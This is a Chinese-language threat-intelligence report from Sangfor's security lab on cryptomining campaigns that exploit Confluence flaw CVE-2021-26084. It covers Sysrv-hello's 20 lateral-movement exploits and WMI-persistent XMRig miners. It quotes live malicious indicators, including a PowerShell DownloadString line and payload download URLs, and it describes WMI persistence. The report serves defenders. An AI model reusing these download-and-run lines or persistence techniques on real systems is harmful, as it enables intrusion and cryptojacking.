近期深信服威胁情报研究团队跟踪CVE-2021-26084漏洞数周,观察到一些攻击者针对Atlassian Confluence的大规模威胁利用事件,其目标是下载恶意负载,该负载将在用户网络中安装后门或挖矿病毒。尽管CVE-2021-26084的补丁已经发布,但一些客户因多种原因未能及时升级或进行补丁修复,导致针对性的攻击仍在进行中。
在这篇文章中,我们将详细说明这些攻击,分析他们利用此漏洞的有效恶意负载,深入研究攻击并总结这些恶意的攻击活动。
漏洞简介
2021年8月,深信服发布了有关CVE-2021-26084的安全公告,该漏洞可能使攻击者可利用该漏洞在未授权的情况下(在某些情况下未经身份验证的用户),构造恶意数据执行OGNL表达式注入攻击,最终导致命令执行。
受影响的平台: Atlassian Confluence
受影响的各方: Confluence服务器
漏洞类型: 代码注入
影响: 存在OGNL注入漏洞,允许未经身份验证的用户执行任意代码
严重性级别: 严重
利用CVE-2021-26084的攻击事件
近期深信服威胁情报研究团队收集并分析了很多有关针对Atlassian Confluence的攻击流量,虽然这个漏洞有不同的攻击向量,但近期发现的恶意软件攻击都针对参数“queryString”,其中包括Sysrv-hello挖矿木马、利用WMI进行持久化的门罗币挖矿病毒、利用图片格式进行伪装的挖矿病毒等。
Sysrv-hello挖矿木马
Sysrv-hello家族最早出现于2020年12月份,至今其版本迭代已数十次,不断的新增攻击模块,是一个新型且十分活跃的家族。并且其入侵手法基本覆盖到许多政企单位常用的Web服务,横向漏洞攻击模块已达20种,危害严重,深信服威胁情报团队提醒相关运维人员及时更新补丁做好防护。
本次捕获的Sysrv-hello病毒为2022年4月份更新的样本,值得注意的是,攻击者并未将此漏洞集成到恶意软件的横向模块,所以利用CVE-2021-26084攻击的目标对象主要为存在漏洞且对外网映射的Confluence服务器。
Sysrv-hello使用CVE-2021-26084进行攻击的流程如下所示:
Sysrv-hello有效负载利用CVE-2021-26084(使用base64加密)如下图所示:
在成功利用CVE-2021-26084入侵系统后,植入名为ldr.sh的Shell脚本来执行恶意命令。随后从http[:]//194.145.227.21/sys.x86_64下载并执行主体程序。
因为其主体程序sys可执行文件(横向传播模块)是由Golang编写的,因此具有跨平台性。Sysrv-hello的主程序中一共包含20个横向攻击模块,根据随机生成的IP进行端口扫描,判断目标开放的服务,确认攻击方式。
20种横向攻击方式如下表:
编号 | 漏洞 |
1 | XXL-JOB executor 未授权访问漏洞 |
2 | Jupyter未授权访问漏洞 |
3 | Laravel Debug mode RCE(CVE_2021_3129) |
4 | Tomcat 弱口令爆破 |
5 | Jenkins RCE(CVE-2018-1000861) |
6 | Nexus Repository Manager 3 RCE (CVE-2019-7238) |
7 | WebLogic RCE CVE-2020-14882 |
8 | Redis弱口令爆破 |
9 | Supervisord远程命令执行漏洞(CVE-2017-11610) |
10 | JBoss反序列化漏洞(CVE-2017-12149) |
11 | ThinkPHP5 RCE |
12 | PostgreSQL RCE(CVE-2019-9193) |
13 | Confluence RCE(CVE-2019-3396) |
14 | SSH 爆破 |
15 | Struts2-s2-045 RCE (CVE-2017-5638) |
16 | phpunit RCE(CVE-2017-9841) |
17 | Hadoop YARN REST API未授权漏洞利用 |
18 | Wordpress-XMLRPC暴力破解 |
19 | GitLab CE/EE RCE漏洞(CVE-2021-22205) |
20 | Spring Cloud Gateway Actuator RCE漏洞(CVE-2022-22947) |
sys.x86_64主程序运行后会释放门罗币挖矿程序,并将挖矿进程重命名为kthreaddi,然后释放配置文件,当挖矿进程运行起来,便会将配置文件删除。
XMRig挖矿病毒1
这是一个利用WMI(Windows Management Instrumentation)来实现持久化的病毒,该恶意程序通过CVE-2021-26084漏洞入侵成功后,再利用powershell与WMI事件的交互来实现持久性。这种技术的实现不需要任何工具包,主要通过创建三个类:__EventFilter(触发器)、EventConsumer (执行动作)、__FilterToConsumerBinding(绑定触发器和执行动作)来存储有效负载或命令。值得注意的是,WMI事件作为SYSTEM运行,在重新启动后持续存在,但需要管理员级别的权限才能使用此技术。
主要有效载荷是base64编码的:
解码后的特征如下:
DownloadString('http://27.1.1.34:8080/docs/s/wi.txt')
本次捕获病毒脚本(wi.txt)执行了以下操作:
1.擦除WMI中的事件过滤器、动作执行等;
2.监听WmiEventFilter活动,system重启后五分钟执行一次有效负载;
3.按服务名称、计划任务名称删除挖矿竞品文件;
4.通过指示性命令行参数终止和移除挖矿竞品程序;
5.使用netstat过滤包含与矿工关联的端口,并终止进程;
6.下载执行自身挖矿程序和配置文件。
配置文件、矿机下载地址如下所示:
配置文件config.json中的钱包地址如下所示:
整体执行流程如下:
XMRig挖矿病毒2
该病毒利用CVE-2021-26084漏洞入侵成功后,会下载前置负载脚本j0u8e3b45j2jup.sh,利用此脚本经过一系列环境配置、竞品删除等操作,最终下载到伪装成图片的主体程序1.png。1.png通过解压,并进行带矿池参数(43.133.189.75:3333)执行挖矿程序。
下载的矿机为6.17.0版本的XMRig开源矿机,如下图所示:
小结
深信服已观察到许多针对Atlassian Confluence的威胁利用,尽管CVE-2021-26084的补丁已经发布,但攻击仍在进行中。这表明即使是过去的漏洞,易用性强且具备获取目标控制权限的攻击能力的漏洞仍然会受到众多攻击者偏爱。
此外,近年来网络犯罪分子的攻击正在影响着全球的企业,除了利用较新的漏洞外,他们也开始采取更复杂的商业模式,并采用新的技术来创造高效和隐蔽的攻击。为防止恶意软件对企业的造成损害,建议企业用户做好相关防护措施,及时修复系统漏洞补丁。
解决方案
漏洞修复建议
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:
https://www.atlassian.com/software/confluence/download-archives
深信服解决方案
【深信服终端检测响应平台EDR】已支持查杀拦截此次事件使用的病毒文件,请更新软件(如有定制请先咨询售后再更新版本)和病毒库至最新版本,及时查杀新威胁;
【深信服下一代防火墙AF】的安全防护规则更新至最新版本,接入深信服云平台,“云鉴” 服务即可轻松抵御此高危风险。
【深信服安全感知管理平台SIP】建议用户及时更新规则库,接入云图,并联动【深信服下一代防火墙AF】实现对高危风险的入侵防护。
【深信服安全托管服务MSS】以保障用户网络安全“持续有效”为目标,通过将用户安全设备接入安全运营中心,依托于XDR安全能力平台和MSSP安全服务平台实现有效协同的“人机共智”模式,围绕资产、脆弱性、威胁、事件四个要素为用户提供7*24H的安全运营服务,快速扩展持续有效的安全运营能力,保障可承诺的风险管控效果。
参考链接
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug
https://www.4hou.com/index.php/posts/XqNl
深信服千里目安全实验室
深信服科技旗下安全实验室,致力于网络安全攻防技术的研究和积累,深度洞察未知网络安全威胁,解读前沿安全技术。
● 扫码关注我们
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...